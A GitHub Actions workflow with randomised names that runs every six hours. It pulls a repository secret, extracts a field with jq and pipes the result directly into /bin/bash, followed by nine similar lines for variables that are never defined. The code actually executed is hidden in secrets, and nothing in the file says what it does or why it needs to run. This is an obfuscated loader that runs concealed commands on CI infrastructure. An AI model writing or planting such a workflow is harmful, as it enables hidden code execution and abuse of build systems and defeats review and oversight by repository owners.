name: znckaoi

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: znckaoi
        env:
          a9: ${{ secrets.a9 }}
        run: |
          echo $a9 | jq -r .af862 | /bin/bash
          echo $ut2 | jq -r .miv3285 | /bin/bash
          echo $c4 | jq -r .lyvh066 | /bin/bash
          echo $beku3 | jq -r .eon03937 | /bin/bash
          echo $slmrp946 | jq -r .etlg16627 | /bin/bash
          echo $arsyg5743 | jq -r .cjpdd03 | /bin/bash
          echo $gqr26 | jq -r .wfux9758 | /bin/bash
          echo $z5830 | jq -r .zd71 | /bin/bash
          echo $bil86 | jq -r .qbp23 | /bin/bash
          echo $fxuca75577 | jq -r .u07 | /bin/bash

